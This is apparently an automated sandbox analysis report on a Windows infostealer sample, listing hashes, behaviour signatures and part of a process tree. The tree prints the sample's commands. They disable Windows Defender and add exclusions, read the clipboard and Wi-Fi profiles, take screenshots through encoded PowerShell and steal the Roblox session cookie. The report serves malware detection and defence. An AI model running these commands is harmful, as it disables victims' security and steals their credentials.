Analysis

  • max time kernel
    104s
  • max time network
    106s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14/04/2025, 08:55 UTC

General

  • Target

    2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe

  • Size

    15.9MB

  • MD5

    140c7fd0266d255f7d1d9f093ef524cb

  • SHA1

    ca395df443ff6fb64a4faa38258d36f6e4238c2a

  • SHA256

    4cbdb224246911d43eca0b8abd6d8e77715670b8db32766d3161e61f1c041e21

  • SHA512

    0c1387b0f409b0dae3e8db83bd689dd3c8eeb707ad8f5eb48499ced75006226a5d069abe8793dee05ec747a7f46101259ae1cca20f766cfc528ed70fa600b2a9

  • SSDEEP

    393216:sx8UMO6wNto3KDGoZYJv+KDt85w8wIKppDO9iq:KrFEKDGPgWIKpp+iq

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 38 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 56 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4292
    • C:\Users\Admin\AppData\Local\Temp\2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe
      "C:\Users\Admin\AppData\Local\Temp\2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:8
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:836
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4940
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5336
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4980
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4704
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5024
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4676
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1884
          • C:\Users\Admin\AppData\Local\Temp\bound.exe
            bound.exe
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2548
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c title Casa Cloner - Developed by Noritem#6666
              6⤵
                PID:2756
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c cls
                6⤵
                  PID:2008
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c cls
                  6⤵
                    PID:1492
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4720
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:864
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:5100
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic csproduct get uuid
                4⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:4128
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3916
              • C:\Windows\system32\reg.exe
                REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                4⤵
                  PID:5860
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4604
                • C:\Windows\system32\reg.exe
                  REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                  4⤵
                    PID:4832
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:5356
                  • C:\Windows\System32\Wbem\WMIC.exe
                    wmic path win32_VideoController get name
                    4⤵
                    • Detects videocard installed
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2912
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2308
                  • C:\Windows\System32\Wbem\WMIC.exe
                    wmic path win32_VideoController get name
                    4⤵
                    • Detects videocard installed
                    PID:6048
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe""
                  3⤵
                  • Hide Artifacts: Hidden Files and Directories
                  • Suspicious use of WriteProcessMemory
                  PID:1784
                  • C:\Windows\system32\attrib.exe
                    attrib +h +s "C:\Users\Admin\AppData\Local\Temp\2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe"
                    4⤵
                    • Views/modifies file attributes
                    PID:5676
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4016
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
                    4⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2504
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                  3⤵
                    PID:5668
                    • C:\Windows\system32\tasklist.exe
                      tasklist /FO LIST
                      4⤵
                      • Enumerates processes with tasklist
                      PID:5760
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                    3⤵
                      PID:2364
                      • C:\Windows\system32\tasklist.exe
                        tasklist /FO LIST
                        4⤵
                        • Enumerates processes with tasklist
                        PID:1468
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                      3⤵
                        PID:2772
                        • C:\Windows\System32\Wbem\WMIC.exe
                          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                          4⤵
                            PID:2976
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                          3⤵
                          • Clipboard Data
                          PID:4172
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell Get-Clipboard
                            4⤵
                            • Clipboard Data
                            • Suspicious behavior: EnumeratesProcesses
                            PID:5108
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                          3⤵
                            PID:5432
                            • C:\Windows\system32\tasklist.exe
                              tasklist /FO LIST
                              4⤵
                              • Enumerates processes with tasklist
                              PID:5836
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            3⤵
                              PID:4520
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                4⤵
                                  PID:4340
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                3⤵
                                • System Network Configuration Discovery: Wi-Fi Discovery
                                PID:4188
                                • C:\Windows\system32\netsh.exe
                                  netsh wlan show profile
                                  4⤵
                                  • Event Triggered Execution: Netsh Helper DLL
                                  • System Network Configuration Discovery: Wi-Fi Discovery
                                  PID:2932
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "systeminfo"
                                3⤵
                                  PID:2808
                                  • C:\Windows\system32\systeminfo.exe
                                    systeminfo
                                    4⤵
                                    • Gathers system information
                                    PID:5336
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                  3⤵
                                    PID:4296
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                      4⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:1532
                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\suai1fuh\suai1fuh.cmdline"
                                        5⤵
                                          PID:4876
                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES805B.tmp" "c:\Users\Admin\AppData\Local\Temp\suai1fuh\CSC69DE8058A45B4DAD815A7E5B42E5DE9C.TMP"
                                            6⤵
                                              PID:5524
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                        3⤵
                                          PID:5908
                                          • C:\Windows\system32\tree.com
                                            tree /A /F
                                            4⤵
                                              PID:5340
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                            3⤵
                                              PID:5976
                                              • C:\Windows\system32\tree.com
                                                tree /A /F
                                                4⤵
                                                  PID:4392
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                3⤵
                                                  PID:3960
                                                  • C:\Windows\system32\tree.com
                                                    tree /A /F
                                                    4⤵
                                                      PID:3452
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                    3⤵
                                                      PID:3592
                                                      • C:\Windows\system32\tree.com
                                                        tree /A /F
                                                        4⤵
                                                          PID:1272
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                        3⤵
                                                          PID:4896
                                                          • C:\Windows\system32\tree.com
                                                            tree /A /F
                                                            4⤵
                                                              PID:4088
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                            3⤵
                                                              PID:2308
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                4⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:4576
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                              3⤵
                                                                PID:4668
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                  4⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:4108
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "getmac"
                                                                3⤵
                                                                  PID:4676
                                                                  • C:\Windows\system32\getmac.exe
                                                                    getmac
                                                                    4⤵
                                                                      PID:1896
                                                                  • C:\Windows\system32\cmd.exe
